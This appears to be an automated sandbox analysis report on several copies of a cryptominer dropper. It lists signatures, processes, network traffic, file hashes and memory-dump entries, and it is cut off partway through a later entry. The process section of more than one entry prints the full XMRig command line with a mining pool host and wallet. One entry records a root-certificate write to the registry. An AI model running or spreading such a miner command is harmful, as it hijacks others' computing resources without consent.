
memory/4816-62-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-63-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-64-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-65-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-66-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-67-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-68-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-69-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-70-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-71-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-72-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-73-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-74-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-75-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-76-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-77-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-78-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-79-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-80-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-81-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-82-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 130.109.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4564-16-0x0000028291E80000-0x0000028291EA0000-memory.dmp

memory/4564-17-0x0000028293780000-0x00000282937A0000-memory.dmp

memory/4564-18-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-19-0x0000028326160000-0x0000028326180000-memory.dmp

memory/4564-20-0x00000282937A0000-0x00000282937C0000-memory.dmp

memory/4564-21-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-22-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-24-0x0000028326160000-0x0000028326180000-memory.dmp

memory/4564-23-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-25-0x00000282937A0000-0x00000282937C0000-memory.dmp

memory/4564-26-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-27-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-28-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-29-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-30-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-31-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-32-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-33-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-34-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-35-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-36-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-37-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-38-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-39-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-40-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-41-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-42-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-43-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-44-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-45-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-46-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-47-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-48-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-49-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-50-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-51-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-52-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-53-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-54-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-55-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-56-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-57-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-58-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-59-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-60-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-61-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-62-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-63-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-64-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-65-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-66-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-67-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-68-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-69-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-70-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-71-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-72-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-73-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-74-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-75-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-76-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-77-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-78-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-79-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-80-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-81-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-82-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-83-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

memory/4564-84-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1790s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3928-16-0x000001EBA5F70000-0x000001EBA5F90000-memory.dmp

memory/3928-17-0x000001EBA78A0000-0x000001EBA78C0000-memory.dmp

memory/3928-18-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-20-0x000001EBA78E0000-0x000001EBA7900000-memory.dmp

memory/3928-19-0x000001EBA78C0000-0x000001EBA78E0000-memory.dmp

memory/3928-21-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-22-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-23-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-25-0x000001EBA78E0000-0x000001EBA7900000-memory.dmp

memory/3928-24-0x000001EBA78C0000-0x000001EBA78E0000-memory.dmp

memory/3928-26-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-27-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-28-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-29-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-30-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-31-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-32-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-33-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-34-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-35-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-36-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-37-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-38-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-39-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-40-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-41-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-42-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-43-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-44-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-45-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-46-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-47-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-48-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-49-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-50-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-51-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-52-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-53-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-54-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-55-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-56-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-57-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-58-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-59-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-60-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-61-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-62-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-63-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-64-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-65-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-66-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-67-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-68-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-69-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-70-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-71-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-72-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-73-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-74-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-75-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-76-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-77-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-78-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-79-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-80-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-81-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-82-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-83-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

memory/3928-84-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1797s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
